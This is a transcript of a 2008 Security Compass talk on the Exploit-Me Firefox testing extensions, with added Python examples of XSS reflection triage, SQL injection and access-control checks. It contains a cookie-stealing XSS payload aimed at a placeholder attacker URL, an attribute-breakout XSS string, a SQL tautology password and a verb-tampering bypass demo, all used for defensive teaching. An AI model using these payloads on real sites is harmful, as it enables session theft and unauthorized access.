Firefox Plug-ins for Application Penetration Testing: Exploit-Me
© 2008 Security Compass inc.


Slide 2: Who are we?
Tom Aratyn
– Software Developer at Security Compass
– Developed the Exploit-Me tools

Slide 3: Who are we?
Jamie
– Security Consultant for Security Compass
– Background in security research, penetration testing, and software development

Slide 4: Agenda
– Cross-site scripting: really a danger?
– State of web application security
– XSS-Me
– SQL Inject-Me
– Access-Me

Slide 5: XSS: Really a Danger?
We know XSS can be dangerous, but can we use it to rob a bank?
– AJAX + CSRF + XSS = major problem

Slide 6: Two Exciting Flavours
Reflected
– Spat straight back as soon as it goes in
– XSS-Me helps here
Stored
– Saved for someone else to hit later
– XSS-Me: future version

Slide 7: What is this XSS Stuff?
– Un-validated user input executed by the user's computer
– JavaScript is typically used
  – PDF files are XSS-able too
– "Someone took my cookie": the classic payload sends the victim's browser to an attacker-controlled URL with the cookie in the query string (the attacker URL in the slide's code was lost in the transcript and is shown as a placeholder):
  location.href = "<attacker URL>?" + escape(document.cookie);

Slide 8: Someone Changed my App
– AJAX adds a new element to these attacks
  – AJAX was used in the IBDBank attack
– The attacker can drive the application as if the victim were doing it:
  – Send
  – Receive
  – Parse

Slide 9: State of Web App Insecurity
– Web application exploits outnumber buffer overflows in CVE
– A large portion of web applications suffer from XSS or SQL injection

Slide 10: Testing Tools
– Various tools exist: OWASP tools, commercial, open source
– They work very well, for what they were built to do

Slide 11: The Missing Piece
– Most tools are not built for developers or QA
– Developers and QA must be checking for security vulnerabilities too
– They need lightweight tools

Slide 12: XSS-Me 0.4 to the Rescue
– Firefox extension to test for cross-site scripting

Slide 13: XSS-Me Features
– Pick the forms and fields to test
– Firefox 3
– Import/export/add/remove XSS strings
– Test & Surf
– Heuristics to limit tests

Slide 14: Heuristics?
– Checking all attacks against all fields is slow
  – No, trust me, it's slow
– Heuristic tests limit the fields we have to check by first determining whether we can inject into them at all
  – Passes a set of characters ( ; \ / < > = ' " ) and checks whether they are reflected in the response, that is, echoed back rather than stripped or encoded

Slide 15: Behind the Magic
– Each attack string attempts to set document.vulnerable=true in the page's DOM
– If the property is set, the attack executed: confirmed vulnerability
– Also checks whether the attack string comes back as plain text in the response, which is reported as a potential vulnerability
  – e.g. an onMouseOver injection that only fires when the user interacts with the element
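The two-tier approach of slides 14 and 15 (a cheap reflection probe to decide which fields deserve the full attack-string run, then a check for the attack string surviving as plain text) is modelled below. This is an added example written for this page, not XSS-Me's own code: the set of probe characters is the slide's, but the list of "known encodings", the rule that only a raw `<`, `>`, `'` or `"` makes a field worth attacking, and the three sample sinks are assumptions. The executed-JavaScript tier (reading `document.vulnerable` back from the DOM) needs a browser and is not reproduced.

```python
import html
import re
import uuid

# The characters the slide says XSS-Me probes with: ; \ / < > = ' "
PROBE_CHARS = ";\\/<>='\""

# Encodings a well-behaved application may emit instead of the raw character.
# Assumed list; any other transformation is treated as "stripped".
KNOWN_ENCODINGS = {
    ";": ["&#59;", "&#x3b;"],
    "\\": ["\\\\", "&#92;", "&#x5c;"],
    "/": ["\\/", "&#47;", "&#x2f;"],
    "<": ["&lt;", "&#60;", "&#x3c;"],
    ">": ["&gt;", "&#62;", "&#x3e;"],
    "=": ["&#61;", "&#x3d;"],
    "'": ["\\'", "&#39;", "&#x27;", "&apos;"],
    '"': ['\\"', "&quot;", "&#34;", "&#x22;"],
}

# Characters needed to break out of an HTML text or attribute context.
# Assumed gate: the slide does not say which returned characters count.
BREAKOUT_CHARS = set("<>'\"")


def make_probe():
    """Return (marker, probe_value). The unique marker locates *our* reflection
    rather than an unrelated '<' elsewhere in the page."""
    marker = "xssme" + uuid.uuid4().hex[:8]
    return marker, marker + PROBE_CHARS


def reflected_unencoded(marker, body):
    """Set of probe characters echoed back raw right after the marker.

    Known encodings are matched before the raw character so that an escaped
    backslash pair is not mistaken for a surviving backslash. A character that
    is neither raw nor a known encoding is treated as stripped and the scan
    continues at the same position.
    """
    survivors = set()
    body_l = body.lower()
    for m in re.finditer(re.escape(marker.lower()), body_l):
        pos = m.end()
        for ch in PROBE_CHARS:
            for enc in KNOWN_ENCODINGS[ch]:
                if body_l.startswith(enc.lower(), pos):
                    pos += len(enc)
                    break
            else:
                if body_l.startswith(ch, pos):
                    survivors.add(ch)
                    pos += 1
    return survivors


def worth_attacking(survivors):
    """Heuristic gate: run the full attack-string set only if a breakout
    character came back raw."""
    return bool(survivors & BREAKOUT_CHARS)


def triage_field(render):
    """Send one probe through a field's renderer; return (survivors, attack?)."""
    marker, probe = make_probe()
    survivors = reflected_unencoded(marker, render(probe))
    return survivors, worth_attacking(survivors)


def payload_reflected_verbatim(payload, body):
    """Slide 15's plain-text tier: the attack string appears unchanged."""
    return payload in body


# --- Constructed sample sinks standing in for three web applications --------

def render_encoded(value):
    """HTML-encodes the input: the safe case."""
    return "<p>You searched for: %s</p>" % html.escape(value, quote=True)


def render_raw_attribute(value):
    """Drops the input unencoded into an attribute value."""
    return '<input type="text" name="q" value="%s">' % value


def render_strip_angles(value):
    """Strips < and > (a common 'fix') but leaves quotes alone."""
    cleaned = value.replace("<", "").replace(">", "")
    return '<input type="text" name="q" value="%s">' % cleaned


# Attribute-breakout string of the kind XSS-Me carries: no angle brackets
# needed, and it only fires on mouse-over, hence "potential" rather than proven.
ATTR_PAYLOAD = '" onmouseover="document.vulnerable=true'


if __name__ == "__main__":
    for name, sink in [("encoded", render_encoded),
                       ("raw attribute", render_raw_attribute),
                       ("strip <>", render_strip_angles)]:
        survivors, attack = triage_field(sink)
        verbatim = payload_reflected_verbatim(ATTR_PAYLOAD, sink(ATTR_PAYLOAD))
        print("%-14s raw=%-10s attack=%-5s payload-verbatim=%s"
              % (name, "".join(sorted(survivors)), attack, verbatim))
```

The encoded sink still echoes `; \ / =` raw, which is why the gate looks for breakout characters rather than for any reflection at all; the strip-angles sink shows the case the slide's onMouseOver remark is about: no `<` or `>` survives, but `"` does, and the attribute payload comes back verbatim.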

Slide 16: Thank $deity for Struts
– Everyone says "use Struts to protect yourself"
  – Sure, just don't follow the supplied examples

Slide 17: Being Bobby
(Courtesy XKCD.com)
Code (classic ASP):
  sql = "SELECT * FROM users WHERE username = '" & Request("username") & "' AND password = '" & Request("password") & "'"
User input:
  username = jimmy
  password = blah' OR '1'='1
Resulting query:
  SELECT * FROM users WHERE username = 'jimmy' AND password = 'blah' OR '1'='1'
Because AND binds tighter than OR, the WHERE clause is (username = 'jimmy' AND password = 'blah') OR '1'='1', which is true for every row, so the entire table is returned.

Slide 18: No Excuse
– The defence is well known, and faster than what you are doing now
  – Prepared statements (parameterised queries)
  – Stored procedures
– Caveat: a stored procedure that builds a query string and runs it with EXEC is just as vulnerable, since the concatenation has only moved inside the database. But you are not doing that, right?
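The query from slide 17 and the prepared-statement fix from slide 18, run side by side against an in-memory SQLite database so the difference is observable rather than asserted. This is an added example for this page, not the slide's ASP code: it is Python with the standard `sqlite3` module, the `users` rows are made up, and stored procedures are left out because SQLite has none (the slide's EXEC caveat is exactly the concatenation problem shown in `login_concat`, relocated into the procedure body).

```python
import sqlite3


def make_db():
    """Constructed sample users table; the rows are made up for this demo."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, "
                 "username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("jimmy", "s3cret"), ("alice", "hunter2"), ("bob", "letmein")])
    return conn


def build_query_concat(username, password):
    """The slide's query, built by string concatenation. Returned as text so
    the effect of the input on the SQL itself can be inspected."""
    return ("SELECT * FROM users WHERE username = '" + username +
            "' AND password = '" + password + "'")


def login_concat(conn, username, password):
    """Vulnerable login: whatever the user typed becomes part of the SQL."""
    return conn.execute(build_query_concat(username, password)).fetchall()


def login_prepared(conn, username, password):
    """Fixed login: placeholders. The values travel separately from the SQL
    text, so a quote in the password is just a character in the password."""
    sql = "SELECT * FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchall()


if __name__ == "__main__":
    conn = make_db()
    evil = "blah' OR '1'='1"
    print(build_query_concat("jimmy", evil))
    print("concat   :", len(login_concat(conn, "jimmy", evil)), "rows")
    print("prepared :", len(login_prepared(conn, "jimmy", evil)), "rows")
    print("prepared, real password:", login_prepared(conn, "jimmy", "s3cret"))
```

With the tautology password the concatenated version returns every user; the parameterised version returns nothing, because the database compares the password column against the literal string `blah' OR '1'='1`.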

Slide 19: SQL Inject-Me
– Firefox extension to check for SQL injection

Slide 20: SQL Inject-Me Features
– Pick what you test
– Configure attack strings and success strings
– Large default string set
– Firefox 3
– Test & Surf

Slide 21: What's your method?
– Web and application servers may be vulnerable to HTTP verb tampering attacks
– Such attacks bypass common authorization configurations: when an access rule names only the verbs the author expected (typically GET and POST), a request that uses another verb can reach the handler without passing the check

Slide 22: Access Me
– Firefox extension to check for authentication issues

Slide 23: Access Me Features
– Checks for unauthenticated access vulnerabilities
– Checks for HTTP verb vulnerabilities
– Regular-expression-based parameter detection
– Automatic testing as you surf

Slide 24: Detecting Access Vulnerabilities
– A request you made while authenticated is replayed without the session, and the replayed response is compared with the original
– Failed: the response status is 200 and the response body is too similar to the authenticated one
– Warning: the response status is 200 or the response body is too similar (one signal, not both)
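The classification rule on slide 24, together with the unauthenticated-replay and verb-tampering probes of slides 21 and 23, as an added example for this page (not Access Me's code). Assumptions: the similarity measure is `difflib.SequenceMatcher` with a 0.9 "too similar" threshold, the list of alternative verbs is mine, and `demo_server` is a constructed application whose access rule names only GET and POST, the misconfiguration slide 21 describes. Status and body are the only inputs the slide mentions, so that is all `classify` looks at.

```python
import difflib
from collections import namedtuple

Response = namedtuple("Response", "status body")

# "Too similar" threshold; the slide gives no number, so 0.9 is assumed.
SIMILARITY_THRESHOLD = 0.9

# Verbs replayed on top of the original one. Assumed list.
ALT_VERBS = ["HEAD", "PUT", "DELETE", "OPTIONS", "TRACE", "FOOBAR"]


def similarity(a, b):
    """0.0 .. 1.0 textual similarity of two response bodies."""
    return difflib.SequenceMatcher(None, a, b).ratio()


def classify(baseline, probe, threshold=SIMILARITY_THRESHOLD):
    """Slide 24's rule. baseline: the authenticated response the user saw;
    probe: the same request replayed without the session or with another verb."""
    ok_status = probe.status == 200
    too_similar = similarity(baseline.body, probe.body) >= threshold
    if ok_status and too_similar:
        return "fail"
    if ok_status or too_similar:
        return "warning"
    return "pass"


def run_access_checks(server, method, path, session_cookie):
    """Replay one authenticated request the way Access Me would: once with no
    cookie, then once per alternative verb, also without the cookie.
    server is any callable (method, path, cookie) -> Response."""
    baseline = server(method, path, session_cookie)
    results = {"%s no-session" % method: classify(baseline, server(method, path, None))}
    for verb in ALT_VERBS:
        if verb != method:
            results["%s no-session" % verb] = classify(baseline, server(verb, path, None))
    return results


# --- Constructed server standing in for a misconfigured application ---------

ACCOUNT_PAGE = ("<html><body><h1>Account 12345</h1><p>Balance: 9,400.00</p>"
                "<a href='/transfer'>Transfer</a></body></html>")
LOGIN_REDIRECT = "Redirecting to /login"
VALID_SESSION = "session=constructed-demo-token"

# Access rule that names only the verbs the author expected, as in a
# security-constraint or <Limit> block listing GET and POST; any other verb
# reaches the handler unchecked. The demo ignores HEAD's no-body semantics.
PROTECTED_VERBS = {"GET", "POST"}


def demo_server(method, path, cookie):
    if path != "/account":
        return Response(404, "Not found")
    if method in PROTECTED_VERBS and cookie != VALID_SESSION:
        return Response(302, LOGIN_REDIRECT)
    return Response(200, ACCOUNT_PAGE)


if __name__ == "__main__":
    checks = run_access_checks(demo_server, "GET", "/account", VALID_SESSION)
    for check, verdict in checks.items():
        print("%-20s %s" % (check, verdict))
```

Against this server the plain unauthenticated GET is redirected and passes, while every alternative verb returns the account page with a 200 and fails: the session check never ran because the verb was not in the rule. The "warning" tier catches the in-between cases, such as a 200 that is really the login form, or an error status whose body still leaks the protected content.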

Slide 25: Where can you get 'em?
– Available from our website (the URL was not preserved in the transcript)
– Extra XSS-Me attack strings are also available from the site
– Open sourced under GPL v3

Slide 26: The Future...
May include:
– Spidering
– Stored attacks

Slide 27: Let's have 'em